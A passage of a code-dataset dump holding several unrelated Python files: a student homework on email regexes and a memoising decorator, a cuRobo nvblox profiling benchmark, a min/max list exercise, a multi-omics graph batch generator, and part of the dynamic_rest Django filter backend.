print_emails(sfile):\n \"\"\" Prints the valid emails in a list, and then the not valid ones.\n >>> print_emails(\"hw-week3//emails.txt\")\n valid:\n abc_def@mail.com\n aa@ma-il.cc\n a.a_xc-ks@mail.cc\n a@mail.cc\n aa@mail.cc\n abc-d@mail.com\n Leorabach@gmail.com\n Leorab.ach@gmail.com\n not valid:\n _aa@mail.cc\n abc-@mail.com\n abc..def@mail.com\n Leorabach@gmail.c\n .abc@mail.com\n abc#def@mail.com\n L$e%o@r#abach@gmail.com\n \"\"\"\n with open(sfile, 'r') as file:\n s = file.read()\n lst = [s.split(\" \")]\n valid = []\n n_valid = []\n for l in lst:\n for s in l:\n query = re.match(r\"[a-zA-Z0-9]+([._-][a-zA-Z0-9]+)*@[a-zA-Z0-9]+(-[a-zA-Z0-9]+)*[.][a-zA-Z0-9]{2,}\\b\", s, flags=0)\n if query is not None:\n valid.append(query.group())\n else:\n query = re.match(r\"\\S*\",s,flags=0)\n if query.group() != '':\n n_valid.append(query.group())\n\n print(\"valid:\")\n for s in valid:\n print(s)\n\n print(\"not valid:\")\n for s in n_valid:\n print(s)\n\nimport math\nfrom pyclbr import Function\nfrom typing import Any\n\ndef lastcall(func: Function):\n \"\"\"\n The decorator returns the function with its answer, if it wasn't called with that parameter yet.\n Otherwise, it prints a message that it already was called.\n >>> print_type(\"S\")\n S is a 'str'\n >>> print_type(\"S\")\n I already told you that the answer is None!\n >>> print(pow2(2))\n 4\n >>> pow2(2)\n I already told you that the answer is 4!\n >>> print_type(2)\n 2 is a 'int'\n >>> print(pow2(10))\n 100\n >>> pow2(2)\n I already told you that the answer is 4!\n >>> pow2(10)\n I already told you that the answer is 100!\n \n \"\"\"\n dic = {} # An empty dictionary for checking if the parameter and the function were called already.\n def wrapper(x):\n if (x,func) in dic.keys():\n print(\"I already told you that the answer is \"+str(dic[(x,func)])+\"!\")\n else:\n dic[(x,func)]= func(x)\n return dic[(x,func)]\n return wrapper\n\n@lastcall\ndef pow2(x: float):\n return x**2\n\n@lastcall\ndef powx(x: float):\n return x**x\n\n@lastcall\ndef print_type(x: Any):\n s = str(type(x))\n print(str(x) + \" is a \" + s[7:len(s)-1])\n\n@lastcall\ndef loge(x: int):\n return math.log(x)\n\n@lastcall\ndef log2(x: int):\n return math.log2(x)\n\n@lastcall\ndef log10(x: int):\n return math.log10(x)\n\n# print_emails(\"hw-week3//emails.txt\")\n# print_type(\"S\")\n# print_type(\"S\")\n# print(pow2(2))\n# pow2(2)\n# print_type(2)\n# print(pow2(10))\n# pow2(2)\n# pow2(10)\n\n\nclass List(list):\n \"\"\"\n Class of List, allows to apply with one and more indexes to the [] operator, while to list it has to be exactly one intex.\n >>> print(List([[[1,2,3,33],[4,5,6,66]], [[7,8,9,99],[10,11,12,122]], [[13,14,15,155],[16,17,18,188]], ] )[0,1,3])\n 66\n >>> print(List([[[1,2,3,33],[4,5,6,66]], [[7,8,9,99],[10,11,12,122]], [[13,14,15,155],[16,17,18,188]], ] )[0])\n [[1,2,3,33],[4,5,6,66]]\n \"\"\"\n def __init__(self, lst):\n self.lists = []\n self.len = 0\n for i in range(len(lst)):\n if type(lst[i]) == list:\n self.lists.append(List(lst[i]))\n else:\n self.lists.append(lst[i])\n\n def __setitem__(self, *arg, value: object):\n print(\"setitem\")\n if len(arg) == 1:\n self.lists[arg] = value\n else:\n self.lists[arg[0]][arg[1:]] = value\n\n def __getitem__(self, *arg):\n if type(arg[0]) == int:\n return self.lists[arg[0]]\n elif len(arg[0]) == 1:\n return self.lists[arg[0][0]]\n else:\n return self.lists[arg[0][0]][arg[0][1:]]\n \n\n\n def __str__(self):\n s = \"[\"\n for i in range(len(self.lists)):\n s += str(self.lists[i]) + \",\"\n return s[:-1] + \"]\"\n\n 
def __len__(self):\n return self.len\n\n \n\n\nif __name__ == '__main__':\n import doctest\n print(doctest.testmod())\n","repo_name":"leorasc/Program-academic-research","sub_path":"hw-week3/hw3.py","file_name":"hw3.py","file_ext":"py","file_size_in_byte":4128,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"5955010479","text":"import time\nfrom typing import Any, Dict, List\n\n# Third Party\nimport numpy as np\nimport torch\nimport torch.autograd.profiler as profiler\nfrom nvblox_torch.datasets.sun3d_dataset import Sun3dDataset\nfrom robometrics.datasets import demo_raw\nfrom torch.profiler import ProfilerActivity, profile, record_function\nfrom tqdm import tqdm\n\n# CuRobo\nfrom curobo.geom.sdf.world import CollisionCheckerType, WorldConfig\nfrom curobo.geom.types import Mesh\nfrom curobo.types.math import Pose\nfrom curobo.types.state import JointState\nfrom curobo.util.logger import setup_curobo_logger\nfrom curobo.util_file import (\n get_assets_path,\n get_robot_configs_path,\n get_task_configs_path,\n get_world_configs_path,\n join_path,\n load_yaml,\n)\nfrom curobo.wrap.reacher.motion_gen import MotionGen, MotionGenConfig, MotionGenPlanConfig\n\n# torch.set_num_threads(8)\n# ttorch.use_deterministic_algorithms(True)\ntorch.manual_seed(0)\n\ntorch.backends.cudnn.benchmark = True\n\ntorch.backends.cuda.matmul.allow_tf32 = True\ntorch.backends.cudnn.allow_tf32 = True\nnp.random.seed(10)\n# Third Party\nfrom nvblox_torch.datasets.mesh_dataset import MeshDataset\n\n# CuRobo\nfrom curobo.types.camera import CameraObservation\n\n\ndef load_curobo(n_cubes: int, enable_log: bool = False):\n robot_cfg = load_yaml(join_path(get_robot_configs_path(), \"franka.yml\"))[\"robot_cfg\"]\n robot_cfg[\"kinematics\"][\"collision_sphere_buffer\"] = -0.0\n motion_gen_config = MotionGenConfig.load_from_robot_config(\n robot_cfg,\n \"collision_nvblox_online.yml\",\n trajopt_tsteps=32,\n collision_checker_type=CollisionCheckerType.BLOX,\n use_cuda_graph=False,\n position_threshold=0.005,\n rotation_threshold=0.05,\n num_ik_seeds=30,\n num_trajopt_seeds=12,\n interpolation_dt=0.02,\n store_ik_debug=enable_log,\n store_trajopt_debug=enable_log,\n )\n mg = MotionGen(motion_gen_config)\n mg.warmup(enable_graph=False)\n # print(\"warmed up\")\n # exit()\n return mg\n\n\ndef benchmark_mb(write_usd=False, save_log=False):\n robot_cfg = load_yaml(join_path(get_robot_configs_path(), \"franka.yml\"))[\"robot_cfg\"]\n spheres = robot_cfg[\"kinematics\"][\"collision_spheres\"]\n if isinstance(spheres, str):\n spheres = load_yaml(join_path(get_robot_configs_path(), spheres))[\"collision_spheres\"]\n\n plan_config = MotionGenPlanConfig(\n max_attempts=1,\n enable_graph_attempt=3,\n enable_finetune_trajopt=True,\n partial_ik_opt=False,\n enable_graph=False,\n )\n # load dataset:\n\n file_paths = [demo_raw]\n all_files = []\n for file_path in file_paths:\n all_groups = []\n\n problems = file_path()\n\n for key, v in tqdm(problems.items()):\n # if key not in [\"table_under_pick_panda\"]:\n # continue\n scene_problems = problems[key] # [:2]\n n_cubes = check_problems(scene_problems)\n mg = load_curobo(n_cubes, save_log)\n m_list = []\n i = 1\n for problem in tqdm(scene_problems, leave=False):\n q_start = problem[\"start\"]\n pose = (\n problem[\"goal_pose\"][\"position_xyz\"] + problem[\"goal_pose\"][\"quaternion_wxyz\"]\n )\n\n # reset planner\n mg.reset(reset_seed=False)\n world = WorldConfig.from_dict(problem[\"obstacles\"]).get_mesh_world(\n 
merge_meshes=True\n )\n # clear cache:\n mesh = world.mesh[0].get_trimesh_mesh()\n mg.clear_world_cache()\n obs = []\n # get camera_observations:\n save_path = \"benchmark/log/nvblox/\" + key + \"_\" + str(i)\n\n m_dataset = Sun3dDataset(save_path)\n\n # m_dataset = MeshDataset(\n # None, n_frames=200, image_size=640, save_data_dir=None, trimesh_mesh=mesh\n # )\n obs = []\n tensor_args = mg.tensor_args\n for j in range(len(m_dataset)):\n with profiler.record_function(\"nvblox/create_camera_images\"):\n data = m_dataset[j]\n cam_obs = CameraObservation(\n rgb_image=tensor_args.to_device(data[\"rgba\"]),\n depth_image=tensor_args.to_device(data[\"depth\"]),\n intrinsics=data[\"intrinsics\"],\n pose=Pose.from_matrix(data[\"pose\"].to(device=mg.tensor_args.device)),\n )\n obs.append(cam_obs)\n with profile(activities=[ProfilerActivity.CPU, ProfilerActivity.CUDA]) as prof:\n for j in range(len(obs)):\n cam_obs = obs[j]\n cam_obs.rgb_image = None\n with profiler.record_function(\"nvblox/add_camera_images\"):\n mg.add_camera_frame(cam_obs, \"world\")\n\n with profiler.record_function(\"nvblox/process_camera_images\"):\n mg.process_camera_frames(\"world\", False)\n mg.world_coll_checker.update_blox_hashes()\n\n # run planner\n start_state = JointState.from_position(mg.tensor_args.to_device([q_start]))\n result = mg.plan_single(\n start_state,\n Pose.from_list(pose),\n plan_config,\n )\n print(\"Exporting the trace..\")\n prof.export_chrome_trace(\"benchmark/log/trace/motion_gen_nvblox.json\")\n print(result.success, result.status)\n exit()\n\n\ndef get_metrics_obstacles(obs: Dict[str, List[Any]]):\n obs_list = []\n if \"cylinder\" in obs and len(obs[\"cylinder\"].items()) > 0:\n for _, vi in enumerate(obs[\"cylinder\"].values()):\n obs_list.append(\n Cylinder(\n np.ravel(vi[\"pose\"][:3]), vi[\"radius\"], vi[\"height\"], np.ravel(vi[\"pose\"][3:])\n )\n )\n if \"cuboid\" in obs and len(obs[\"cuboid\"].items()) > 0:\n for _, vi in enumerate(obs[\"cuboid\"].values()):\n obs_list.append(\n Cuboid(np.ravel(vi[\"pose\"][:3]), np.ravel(vi[\"dims\"]), np.ravel(vi[\"pose\"][3:]))\n )\n return obs_list\n\n\ndef check_problems(all_problems):\n n_cube = 0\n for problem in all_problems:\n cache = WorldConfig.from_dict(problem[\"obstacles\"]).get_obb_world().get_cache_dict()\n n_cube = max(n_cube, cache[\"obb\"])\n return n_cube\n\n\nif __name__ == \"__main__\":\n setup_curobo_logger(\"error\")\n benchmark_mb()\n","repo_name":"NVlabs/curobo","sub_path":"benchmark/curobo_nvblox_profile.py","file_name":"curobo_nvblox_profile.py","file_ext":"py","file_size_in_byte":6737,"program_lang":"python","lang":"en","doc_type":"code","stars":331,"dataset":"github-code","pt":"54"} +{"seq_id":"6912951762","text":"# 4. 
Find the largest and smallest number from a given list.\r\n\r\n#creating empty list\r\nlist = []\r\n\r\n#user defined input - length of the list\r\nnum = int(input(\"Enter number of elements in the list: \"))\r\n\r\nfor i in range(1, num + 1):\r\n value = int(input(\"Please enter the Value of %d Element : \" %i))\r\n list.append(value)\r\n\r\nprint(\"The Smallest Element in this List is : \", min(list))\r\nprint(\"The Largest Element in this List is : \", max(list))\r\n\r\n","repo_name":"gandhalik/PythonCA2020-Assignments","sub_path":"Task 3/4.py","file_name":"4.py","file_ext":"py","file_size_in_byte":451,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"32716973004","text":"from collections import OrderedDict\nfrom itertools import islice\n\nimport networkx as nx\nimport numpy as np\nimport pandas as pd\nimport tensorflow as tf\n\nfrom moge.generator.sequences import MultiSequenceTokenizer\nfrom moge.network.hetero import HeteroNetwork\nfrom .subgraph_generator import SubgraphGenerator\n\n\nclass MultiplexGenerator(SubgraphGenerator, MultiSequenceTokenizer):\n def __init__(self, network: HeteroNetwork, variables: list = [], targets: list = None,\n batch_size=500, traversal='neighborhood', traversal_depth=2, sampling=\"log\", n_steps=100,\n maxlen=1400, padding='post', truncating='post', agg_mode=False, tokenizer=None,\n replace=True, seed=0, verbose=True, **kwargs):\n\n super(MultiplexGenerator, self).__init__(network=network,\n variables=variables, targets=targets,\n batch_size=batch_size,\n traversal=traversal, traversal_depth=traversal_depth,\n sampling=sampling,\n n_steps=n_steps,\n directed=None, maxlen=maxlen,\n padding=padding, truncating=truncating,\n agg_mode=agg_mode, tokenizer=tokenizer,\n replace=replace, seed=seed, verbose=verbose,\n **kwargs)\n\n def get_output_types(self):\n return (\n {\"MicroRNA_seqs\": tf.int8, \"MessengerRNA_seqs\": tf.int8, \"LncRNA_seqs\": tf.int8, \"Protein_seqs\": tf.int8,\n \"MicroRNA-MessengerRNA\": tf.float32, \"MicroRNA-LncRNA\": tf.float32, \"LncRNA-MessengerRNA\": tf.float32,\n \"Protein-Protein\": tf.float32},) + \\\n (tf.int64, # y\n tf.bool) # idx_weights\n\n def get_output_shapes(self):\n return ({\"MicroRNA_seqs\": tf.TensorShape([self.batch_size, None]),\n \"MessengerRNA_seqs\": tf.TensorShape([self.batch_size, None]),\n \"LncRNA_seqs\": tf.TensorShape([self.batch_size, None]),\n \"Protein_seqs\": tf.TensorShape([self.batch_size, None]),\n \"MicroRNA-MessengerRNA\": tf.TensorShape([self.batch_size, self.batch_size]),\n \"MicroRNA-LncRNA\": tf.TensorShape([self.batch_size, self.batch_size]),\n \"LncRNA-MessengerRNA\": tf.TensorShape([self.batch_size, self.batch_size]),\n \"Protein-Protein\": tf.TensorShape([self.batch_size, self.batch_size])},) + \\\n (tf.TensorShape([self.batch_size, None]), # y\n tf.TensorShape((self.batch_size))) # idx_weights\n\n def process_normalized_node_degree(self, network):\n self.node_degrees = pd.Series(0, index=self.node_list)\n for modality, network_layer in network.networks.items():\n layer_node_degrees = pd.Series(dict(network_layer.degree(self.node_list)))\n layer_node_degrees = layer_node_degrees / layer_node_degrees.std()\n\n self.node_degrees[layer_node_degrees.index] = self.node_degrees[\n layer_node_degrees.index] + layer_node_degrees\n self.node_degrees = self.node_degrees.to_dict()\n\n self.node_degrees_list = [self.node_degrees[node] if node in self.node_degrees else 0 for node in\n self.node_list]\n self.node_sampling_freq = 
self.normalize_node_degrees(self.node_degrees_list,\n compression=self.sampling)\n print(\"# of nodes to sample from (non-zero degree):\",\n np.count_nonzero(self.node_sampling_freq)) if self.verbose else None\n assert len(self.node_sampling_freq) == len(self.node_list)\n\n def node_sampling(self, batch_size):\n sampled_nodes = self.sample_seed_node(batch_size).tolist()\n\n while len(sampled_nodes) < batch_size:\n add_nodes = self.sample_seed_node(batch_size - len(sampled_nodes)).tolist()\n sampled_nodes = list(OrderedDict.fromkeys(sampled_nodes + add_nodes))\n return sampled_nodes\n\n def bfs_traversal(self, batch_size, seed_node=None):\n sampled_nodes = []\n\n while len(sampled_nodes) < batch_size:\n if seed_node is None or seed_node not in self.node_list:\n start_node = self.sample_seed_node(1)[0]\n else:\n start_node = seed_node\n\n successor_nodes = []\n for modality, network_layer in self.network.networks.items():\n if start_node not in network_layer.nodes:\n continue\n layer_neighbors = [node for source, successors in\n islice(nx.traversal.bfs_successors(network_layer, source=start_node),\n self.traversal_depth) for node in successors]\n\n if len(layer_neighbors) > batch_size / len(self.network.networks):\n layer_neighbors = layer_neighbors[:int(batch_size / len(self.network.networks))]\n successor_nodes.extend(layer_neighbors)\n\n sampled_nodes.extend([start_node] + successor_nodes)\n sampled_nodes = list(OrderedDict.fromkeys(sampled_nodes))\n\n if len(sampled_nodes) > batch_size:\n np.random.shuffle(sampled_nodes)\n sampled_nodes = sampled_nodes[:batch_size]\n return sampled_nodes\n\n def dfs_traversal(self, batch_size, seed_node=None):\n sampled_nodes = []\n\n while len(sampled_nodes) < batch_size:\n if seed_node is None or seed_node not in self.node_list:\n start_node = self.sample_seed_node(1)[0]\n else:\n start_node = seed_node\n\n successor_nodes = []\n for modality, network_layer in self.network.networks.items():\n if start_node not in network_layer.nodes:\n continue\n layer_neighbors = list(\n islice(nx.traversal.dfs_successors(network_layer, source=start_node), batch_size))\n\n if len(layer_neighbors) > batch_size / len(self.network.networks):\n layer_neighbors = layer_neighbors[:int(batch_size // len(self.network.networks))]\n successor_nodes.extend(layer_neighbors)\n\n sampled_nodes.extend([start_node] + successor_nodes)\n sampled_nodes = list(OrderedDict.fromkeys(sampled_nodes))\n\n if len(sampled_nodes) > batch_size:\n np.random.shuffle(sampled_nodes)\n sampled_nodes = sampled_nodes[:batch_size]\n return sampled_nodes\n\n def __getitem__(self, item=None):\n sampled_nodes = self.traverse_network(batch_size=self.batch_size)\n X, y, idx_weights = self.__getdata__(sampled_nodes, variable_length=False)\n\n return X, y, idx_weights\n\n def __getdata__(self, sampled_nodes, variable_length=False, training=True):\n # Features\n X = {}\n for modality in self.network.node_types:\n X[\"_\".join([modality, \"seqs\"])] = self.get_sequence_encodings(sampled_nodes, modality=modality,\n variable_length=variable_length or self.variable_length,\n minlen=40)\n for variable in self.variables:\n if \"expression\" == variable:\n X[\"_\".join([modality, variable])] = self.get_expressions(sampled_nodes, modality=modality)\n else:\n labels_vector = self.annotations[modality].loc[sampled_nodes, variable]\n labels_vector = self.process_label(labels_vector)\n X[\"_\".join([modality, variable])] = self.network.feature_transformer[variable].transform(\n labels_vector)\n\n for layer, network_layer in 
self.network.networks.items():\n layer_key = \"-\".join(layer)\n X[layer_key] = self.network.get_adjacency_matrix(edge_types=layer, node_list=sampled_nodes,\n method=self.method,\n output=self.adj_output)\n\n # Labels\n target_labels = self.network.all_annotations.loc[sampled_nodes, self.targets[0]]\n target_labels = self.process_label(target_labels)\n\n y = self.network.feature_transformer[self.targets[0]].transform(target_labels)\n if self.sparse_target is 1 and training:\n y = self.label_sparsify(y)[[0]] # Select only a single label\n elif self.sparse_target is True and training:\n y = self.label_sparsify(y) # Select all multilabels\n\n # Get a vector of nonnull indicators\n idx_weights = self.network.all_annotations.loc[sampled_nodes, self.targets].notnull().any(axis=1).values * 1\n\n assert len(sampled_nodes) == y.shape[0]\n return X, y, idx_weights\n\n def load_data(self, connected_nodes_only=True, dropna=True, y_label=None, variable_length=False):\n if connected_nodes_only:\n node_list = self.get_connected_nodelist()\n else:\n node_list = self.network.node_list\n\n if dropna:\n node_list = self.network.all_annotations.loc[node_list, self.targets].dropna().index.tolist()\n else:\n node_list = node_list\n\n X, y, idx_weights = self.__getdata__(node_list, variable_length=variable_length, training=False)\n\n if y_label:\n y_labels = self.get_node_labels(y_label, node_list=node_list)\n return X, y_labels\n\n y = pd.DataFrame(y, index=node_list,\n columns=self.network.feature_transformer[self.targets[0]].classes_)\n\n return X, y, idx_weights\n","repo_name":"AspirinCode/MultiOmicsGraphEmbedding","sub_path":"moge/generator/nx/multiplex.py","file_name":"multiplex.py","file_ext":"py","file_size_in_byte":10075,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"72310819040","text":"\"\"\"This module contains custom filter backends.\"\"\"\n\nfrom django.core.exceptions import ValidationError as InternalValidationError\nfrom django.core.exceptions import ImproperlyConfigured\nfrom django.db.models import Q, Prefetch\nfrom django.utils import six\nfrom rest_framework import serializers\nfrom rest_framework.exceptions import ValidationError\nfrom rest_framework.filters import BaseFilterBackend, OrderingFilter\n\nfrom dynamic_rest.conf import settings\nfrom dynamic_rest.datastructures import TreeMap\nfrom dynamic_rest.fields import DynamicRelationField\nfrom dynamic_rest.meta import get_model_field, is_field_remote, is_model_field\nfrom dynamic_rest.patches import patch_prefetch_one_level\nfrom dynamic_rest.related import RelatedObject\n\npatch_prefetch_one_level()\n\n\ndef has_joins(queryset):\n \"\"\"Return True iff. 
a queryset includes joins.\n\n If this is the case, it is possible for the queryset\n to return duplicate results.\n \"\"\"\n for join in six.itervalues(queryset.query.alias_map):\n if join.join_type:\n return True\n return False\n\n\nclass FilterNode(object):\n\n def __init__(self, field, operator, value):\n \"\"\"Create an object representing a filter, to be stored in a TreeMap.\n\n For example, a filter query like `filter{users.events.capacity.lte}=1`\n would be passed into a `FilterNode` as follows:\n\n ```\n field = ['users', 'events', 'capacity']\n operator = 'lte'\n value = 1\n node = FilterNode(field, operator, value)\n ```\n\n Arguments:\n field: A list of field parts.\n operator: A valid filter operator, or None.\n Per Django convention, `None` means the equality operator.\n value: The value to filter on.\n \"\"\"\n self.field = field\n self.operator = operator\n self.value = value\n\n @property\n def key(self):\n return '%s%s' % (\n '__'.join(self.field),\n '__' + self.operator if self.operator else ''\n )\n\n def generate_query_key(self, serializer):\n \"\"\"Get the key that can be passed to Django's filter method.\n\n To account for serialier field name rewrites, this method\n translates serializer field names to model field names\n by inspecting `serializer`.\n\n For example, a query like `filter{users.events}` would be\n returned as `users__events`.\n\n Arguments:\n serializer: A DRF serializer\n\n Returns:\n A filter key.\n \"\"\"\n rewritten = []\n last = len(self.field) - 1\n s = serializer\n for i, field_name in enumerate(self.field):\n # Note: .fields can be empty for related serializers that aren't\n # sideloaded. Fields that are deferred also won't be present.\n # If field name isn't in serializer.fields, get full list from\n # get_all_fields() method. This is somewhat expensive, so only do\n # this if we have to.\n fields = s.fields\n if field_name not in fields:\n fields = getattr(s, 'get_all_fields', lambda: {})()\n\n if field_name == 'pk':\n rewritten.append('pk')\n continue\n\n if field_name not in fields:\n raise ValidationError(\n \"Invalid filter field: %s\" % field_name\n )\n\n field = fields[field_name]\n\n # For remote fields, strip off '_set' for filtering. 
This is a\n # weird Django inconsistency.\n model_field_name = field.source or field_name\n model_field = get_model_field(s.get_model(), model_field_name)\n if isinstance(model_field, RelatedObject):\n model_field_name = model_field.field.related_query_name()\n\n # If get_all_fields() was used above, field could be unbound,\n # and field.source would be None\n rewritten.append(model_field_name)\n\n if i == last:\n break\n\n # Recurse into nested field\n s = getattr(field, 'serializer', None)\n if isinstance(s, serializers.ListSerializer):\n s = s.child\n if not s:\n raise ValidationError(\n \"Invalid nested filter field: %s\" % field_name\n )\n\n if self.operator:\n rewritten.append(self.operator)\n\n return '__'.join(rewritten)\n\n\nclass DynamicFilterBackend(BaseFilterBackend):\n \"\"\"A DRF filter backend that construct DREST querysets.\n\n This backend is responsible for interpretting and applying\n filters, includes, and excludes to the base queryset of a view.\n\n Attributes:\n VALID_FILTER_OPERATORS: A list of filter operators.\n FALSEY_STRINGS: A list of strings that are interpretted as\n False by the isnull operator.\n \"\"\"\n\n VALID_FILTER_OPERATORS = (\n 'in',\n 'any',\n 'all',\n 'icontains',\n 'contains',\n 'startswith',\n 'istartswith',\n 'endswith',\n 'iendswith',\n 'year',\n 'month',\n 'day',\n 'week_day',\n 'regex',\n 'range',\n 'gt',\n 'lt',\n 'gte',\n 'lte',\n 'isnull',\n 'eq',\n None,\n )\n\n FALSEY_STRINGS = (\n '0',\n 'false',\n '',\n )\n\n def filter_queryset(self, request, queryset, view):\n \"\"\"Filter the queryset.\n\n This is the main entry-point to this class, and\n is called by DRF's list handler.\n \"\"\"\n self.request = request\n self.view = view\n\n self.DEBUG = settings.DEBUG\n\n if self.DEBUG:\n # in DEBUG mode, save a representation of the prefetch tree\n # on the viewset\n self.view._prefetches = self._prefetches = {}\n\n return self._filter_queryset(queryset=queryset)\n\n def _extract_filters(self, **kwargs):\n \"\"\"\n Convert 'filters' query params into a dict that can be passed\n to Q. Returns a dict with two fields, 'include' and 'exclude',\n which can be used like:\n\n result = self._extract_filters()\n q = Q(**result['include'] & ~Q(**result['exclude'])\n\n \"\"\"\n\n filters_map = (\n kwargs.get('filters_map') or\n self.view.get_request_feature(self.view.FILTER)\n )\n\n out = TreeMap()\n\n for spec, value in six.iteritems(filters_map):\n\n # Inclusion or exclusion?\n if spec[0] == '-':\n spec = spec[1:]\n inex = '_exclude'\n else:\n inex = '_include'\n\n # for relational filters, separate out relation path part\n if '|' in spec:\n rel, spec = spec.split('|')\n rel = rel.split('.')\n else:\n rel = None\n\n parts = spec.split('.')\n\n # Last part could be operator, e.g. \"events.capacity.gte\"\n if len(parts) > 1 and parts[-1] in self.VALID_FILTER_OPERATORS:\n operator = parts.pop()\n else:\n operator = None\n\n # All operators except 'range' and 'in' should have one value\n if operator == 'range':\n value = value[:2]\n elif operator == 'in':\n # no-op: i.e. 
accept `value` as an arbitrarily long list\n pass\n elif operator in self.VALID_FILTER_OPERATORS:\n value = value[0]\n if (\n operator == 'isnull' and\n isinstance(value, six.string_types)\n ):\n value = value.lower() not in self.FALSEY_STRINGS\n elif operator == 'eq':\n operator = None\n\n node = FilterNode(parts, operator, value)\n\n # insert into output tree\n path = rel if rel else []\n path += [inex, node.key]\n out.insert(path, node)\n\n return out\n\n def _filters_to_query(self, includes, excludes, serializer, q=None):\n \"\"\"\n Construct Django Query object from request.\n Arguments are dictionaries, which will be passed to Q() as kwargs.\n\n e.g.\n includes = { 'foo' : 'bar', 'baz__in' : [1, 2] }\n produces:\n Q(foo='bar', baz__in=[1, 2])\n\n Arguments:\n includes: TreeMap representing inclusion filters.\n excludes: TreeMap representing exclusion filters.\n serializer: serializer instance of top-level object\n q: Q() object (optional)\n\n Returns:\n Q() instance or None if no inclusion or exclusion filters\n were specified.\n \"\"\"\n\n def rewrite_filters(filters, serializer):\n out = {}\n for k, node in six.iteritems(filters):\n filter_key = node.generate_query_key(serializer)\n out[filter_key] = node.value\n\n return out\n\n q = q or Q()\n\n if not includes and not excludes:\n return None\n\n if includes:\n includes = rewrite_filters(includes, serializer)\n q &= Q(**includes)\n if excludes:\n excludes = rewrite_filters(excludes, serializer)\n for k, v in six.iteritems(excludes):\n q &= ~Q(**{k: v})\n return q\n\n def _build_prefetch_queryset(\n self,\n name,\n original_field,\n field,\n filters,\n requirements\n ):\n \"\"\"Applies prefetches to a queryset.\"\"\"\n related_queryset = getattr(original_field, 'queryset', None)\n\n if callable(related_queryset):\n related_queryset = related_queryset(field)\n\n source = field.source or name\n # Popping the source here (during explicit prefetch construction)\n # guarantees that implicitly required prefetches that follow will\n # not conflict.\n required = requirements.pop(source, None)\n\n if self.DEBUG:\n # push prefetches\n prefetches = self._prefetches\n self._prefetches[source] = {}\n self._prefetches = self._prefetches[source]\n\n queryset = self._filter_queryset(\n serializer=field,\n filters=filters.get(name, {}),\n queryset=related_queryset,\n requirements=required\n )\n\n if self.DEBUG:\n # pop back\n self._prefetches = prefetches\n\n return queryset\n\n def _add_internal_prefetches(\n self,\n prefetches,\n requirements\n ):\n \"\"\"Add internal (required) prefetches to a prefetch dictionary.\"\"\"\n paths = requirements.get_paths()\n for path in paths:\n # Remove last segment, which indicates a field name or wildcard.\n # For example, {model_a : {model_b : {field_c}}\n # should be prefetched as a__b\n prefetch_path = path[:-1]\n key = '__'.join(prefetch_path)\n if key:\n prefetches[key] = key\n if self.DEBUG:\n self._prefetches[key] = {}\n\n def _add_request_prefetches(\n self,\n prefetches,\n requirements,\n model,\n fields,\n filters\n ):\n \"\"\"Add external (requested) prefetches to a prefetch dictionary.\"\"\"\n for name, field in six.iteritems(fields):\n original_field = field\n if isinstance(field, DynamicRelationField):\n field = field.serializer\n if isinstance(field, serializers.ListSerializer):\n field = field.child\n if not isinstance(field, serializers.ModelSerializer):\n continue\n\n source = field.source or name\n if '.' 
in source:\n raise ValidationError(\n 'nested relationship values '\n 'are not supported'\n )\n\n if source in prefetches:\n # ignore duplicated sources\n continue\n\n is_remote = is_field_remote(model, source)\n is_id_only = getattr(field, 'id_only', lambda: False)()\n if is_id_only and not is_remote:\n continue\n\n prefetch_queryset = self._build_prefetch_queryset(\n name,\n original_field,\n field,\n filters,\n requirements\n )\n\n # Note: There can only be one prefetch per source, even\n # though there can be multiple fields pointing to\n # the same source. This could break in some cases,\n # but is mostly an issue on writes when we use all\n # fields by default.\n prefetches[source] = Prefetch(\n source,\n queryset=prefetch_queryset\n )\n\n def _extract_requirements(\n self,\n fields,\n requirements\n ):\n \"\"\"Extract internal prefetch requirements from serializer fields.\"\"\"\n for name, field in six.iteritems(fields):\n source = field.source\n # Requires may be manually set on the field -- if not,\n # assume the field requires only its source.\n requires = getattr(field, 'requires', None) or [source]\n for require in requires:\n if not require:\n # ignore fields with empty source\n continue\n\n requirement = require.split('.')\n if requirement[-1] == '':\n # Change 'a.b.' -> 'a.b.*',\n # supporting 'a.b.' for backwards compatibility.\n requirement[-1] = '*'\n requirements.insert(requirement, TreeMap(), update=True)\n\n def _filter_queryset(\n self,\n serializer=None,\n filters=None,\n queryset=None,\n requirements=None\n ):\n \"\"\"Recursive queryset builder.\n\n Handles nested prefetching of related data and deferring fields\n at the queryset level.\n\n Arguments:\n serializer: An optional serializer to use a base for the queryset.\n If no serializer is passed, the `get_serializer` method will\n be used to initialize the base serializer for the viewset.\n filters: An optional TreeMap of nested filters.\n queryset: An optional base queryset.\n requirements: An optional TreeMap of nested requirements.\n \"\"\"\n\n is_root_level = False\n if serializer:\n if queryset is None:\n queryset = serializer.Meta.model.objects\n else:\n serializer = self.view.get_serializer()\n is_root_level = True\n\n model = getattr(serializer.Meta, 'model', None)\n\n if not model:\n return queryset\n\n prefetches = {}\n fields = serializer.fields\n\n if requirements is None:\n requirements = TreeMap()\n\n self._extract_requirements(\n fields,\n requirements\n )\n\n if filters is None:\n filters = self._extract_filters()\n\n # build nested Prefetch queryset\n self._add_request_prefetches(\n prefetches,\n requirements,\n model,\n fields,\n filters\n )\n\n # add any remaining requirements as prefetches\n self._add_internal_prefetches(\n prefetches,\n requirements\n )\n\n # use requirements at this level to limit fields selected\n # only do this for GET requests where we are not requesting the\n # entire fieldset\n if '*' not in requirements and not self.view.is_update():\n id_fields = getattr(serializer, 'get_id_fields', lambda: [])()\n # only include local model fields\n only = [\n field for field in set(id_fields + list(requirements.keys()))\n if is_model_field(model, field)\n and not is_field_remote(model, field)\n ]\n queryset = queryset.only(*only)\n\n # add filters\n query = self._filters_to_query(\n includes=filters.get('_include'),\n excludes=filters.get('_exclude'),\n serializer=serializer\n )\n\n if query:\n # Convert internal django ValidationError to APIException-based one\n # in order to 
